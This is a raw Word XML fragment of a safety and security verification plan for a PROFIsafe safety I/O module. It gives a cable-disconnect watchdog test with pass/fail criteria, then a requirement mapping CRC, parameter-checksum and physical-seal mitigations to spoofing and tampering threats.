          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681F0052" w14:textId="20733429"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6A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F44C744" w14:textId="6D50731D"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E6C51" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-2</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F74D4D0" w14:textId="515CDB0C" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="006E267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Reach normal operating state with a known watchdog time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC5AA13" w14:textId="77777777" w:rsidR="003D5DC3"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Interrupt the safe-communication path for longer than the watchdog time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A08808" w14:textId="77777777" w:rsidR="005F7F02"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Measure the time to reach the safe state; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="661A5964" w14:textId="091AFEA6" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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outputs de-</w:t>
            </w:r>
            <w:r w:rsidR="005F7F02" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>energized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and qualifier bad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79EE9EBD" w14:textId="1BE44967" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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Restore the link; confirm no automatic re-integration occurs without acknowledgement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C36D0A"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passivation occurs within the specified device response time, outputs are de-energized, the qualifier is bad, and re-integration is gated by acknowledgement. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F6DB2D" w14:textId="39E9B36B" w:rsidR="006A2F66"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outputs remain energized beyond the watchdog time, or the device auto-re-integrates without acknowledgement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="241C207E" w14:textId="77777777" w:rsidR="006A2F66" w:rsidRPr="006D5B99" w:rsidRDefault="006A2F66" w:rsidP="006A2F66">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C6FCC3" w14:textId="77777777" w:rsidR="006A2F66" w:rsidRPr="006D5B99" w:rsidRDefault="006A2F66" w:rsidP="006A2F6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6D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D496C0C" w14:textId="77777777" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">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737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E914A6E" w14:textId="37042940" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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TC-RQ001-0</w:t>
            </w:r>
            <w:r w:rsidR="00D90D68" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24464BAD" w14:textId="576B9224" w:rsidR="006A2F66" w:rsidRPr="006D5B99" w:rsidRDefault="00EC71B4" w:rsidP="00FD51B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NV1 </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51D1" w:rsidRPr="006D5B99"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DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="00DF51D1" w:rsidP="00DF51D1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0846B0A6" w14:textId="5EBD965C" w:rsidR="00DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="00DF51D1" w:rsidP="00DF51D1">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TIA Online &amp; Diagnostics, Wireshark timestamps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51D1" w:rsidRPr="006D5B99"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DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="00DF51D1" w:rsidP="00DF51D1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7291DB1F" w14:textId="0D66F6E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1: baseline </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60903104"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confirm SRIO is in Operate and note F_WD_Time (default 150 ms,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B550E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SRIO-1857 / GSD F_WD_Time) under: Hardware configuration &gt; SRIO module &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EE723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Properties &gt; PROFIsafe &gt; F-Parameters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA03A7E"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FF0A214" w14:textId="0A9AECED"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2: interrupt the communication path for &gt; F_WD_Time </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="050793AC" w14:textId="099AB4FC" w:rsidR="00C23BD7" w:rsidRPr="006D5B99" w:rsidRDefault="00C23BD7" w:rsidP="00A03A36">
            <w:pPr>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 xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>physically disconnect the SRIO's fieldbus cable for ~2s.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB8E1DD"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65BD8D7C" w14:textId="1AA6932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3: in the TIA watch table, record the exact time of passivation </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E9C2B6"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Watch table:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DF92D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Qualifier bit -&gt; bad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="011109F7"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 F-DO outputs -&gt; Low</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B803A1"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Portal &gt; Online &amp; Diagnostics &gt; Diagnostics buffer: note the connection-loss entry</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F6FE21F"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242B22A" w14:textId="0EAAFB9C"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4: restore the connection </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B9A2E3"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Re-enable the port / reconnect the cable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AAD01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AFCA804" w14:textId="52C386B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w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Step 5: verify that re-integration requires explicit acknowledgement </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C66FC0"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TIA watch table: confirm the module does NOT automatically return to Operate;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CBA11D5" w14:textId="77777777" w:rsidR="00C23BD7" w:rsidRPr="006D5B99" w:rsidRDefault="00C23BD7" w:rsidP="00C23BD7">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send the acknowledge command (ChF_ACK, Control-Byte Bit 6) from the PLC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BF95F2" w14:textId="094B069A" w:rsidR="00DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="00C23BD7" w:rsidP="00C23BD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program / watch table, then confirm the module returns to Operate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51D1" w:rsidRPr="006D5B99"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DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="00DF51D1" w:rsidP="00DF51D1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015B8D3F" w14:textId="566932AF" w:rsidR="00DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="00DF51D1" w:rsidP="00DF51D1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4541D828" w14:textId="77777777" w:rsidR="005915A5" w:rsidRPr="006D5B99"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p>
          <w:p w14:paraId="7AD4A0DE" w14:textId="77777777" w:rsidR="007F69E5" w:rsidRPr="006D5B99" w:rsidRDefault="0013021B" w:rsidP="00DF51D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passivation occurs within the specified device response time, outputs de-energized/Low, qualifier bad; re-integration only after acknowledgement. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F1632E" w14:textId="44895C19" w:rsidR="00DF51D1" w:rsidRPr="006D5B99" w:rsidRDefault="0013021B" w:rsidP="00DF51D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Evidence: TIA diagnostics-buffer export</w:t>
            </w:r>
            <w:r w:rsidR="007F69E5" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>timestamps from switch log or stopwatch measurement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="260C0B08" w14:textId="1D363E72" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF4A421" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F005DFA" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD04FAE" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D75DAC" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1532CE67" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799E442C" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A1718C" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258986EB" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D9F2C7" w14:textId="77777777" w:rsidR="00723D6F" w:rsidRPr="006D5B99" w:rsidRDefault="00723D6F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148CBF3F" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CEB7C4" w14:textId="77777777" w:rsidR="00883860" w:rsidRPr="006D5B99" w:rsidRDefault="00883860" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCAA654" w14:textId="77777777" w:rsidR="003D5DC3" w:rsidRPr="006D5B99" w:rsidRDefault="003D5DC3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DAF634" w14:textId="6BCCDFAF" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F23F82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1F4523B" w14:textId="760B44DB" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="005900F0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503555C" w14:textId="1951AA5A"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5900F0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall protect hardware components transmitting signal or data relevant to connection or access to safety-critical software against corruption, whether accidental or intentional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE7F8A" w14:textId="0380DC9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C433F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.1,</w:t>
      </w:r>
      <w:r w:rsidR="00D727D8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 3.1 RE (1), </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00721ED9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 3.4, </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR 3.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FB828" w14:textId="13A8E40B" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C (Transmitted Safety Frame), G (physical F-address interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7568CD5D" w14:textId="1D4A84BD"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AB010A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0009084A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spoofing,</w:t>
      </w:r>
      <w:r w:rsidR="00AB010A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0009084A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
      <w:r w:rsidR="009E5C94" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E4521" w14:textId="77777777" w:rsidR="001C12A7" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Function (Mitigation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D97B08" w14:textId="3E7A5A93"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4-byte CRC + CRC-Seed24/32:  Frame-level accidental-corruption detection (SRIO-2998).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351A4E5" w14:textId="2789F8D5"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iParCRC (UINT32) + F_ParCRC (UINT16): Parameter-transfer protection; a mismatch is rejected as EC3 (SRIO-2998, SRIO-8574/8575, SRIO-12627).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2FA782" w14:textId="29F2F9FD"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Certified CRC-Tool (T2, TÜV Süd): iParCRC generated by an externally certified off-line tool (SRIO-9023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539D02F" w14:textId="255817EB"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w:t>
      </w:r>
      <w:r w:rsidR="00B22D12" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A runtime change of the F-address is ignored until reboot (SRIO-8803, SRIO-10812)</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a temporal protection of the running safety function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08177409" w14:textId="20111DFE" w:rsidR="00E63285" w:rsidRPr="006D5B99" w:rsidRDefault="00E63285" w:rsidP="00E63285">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Physical seals</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
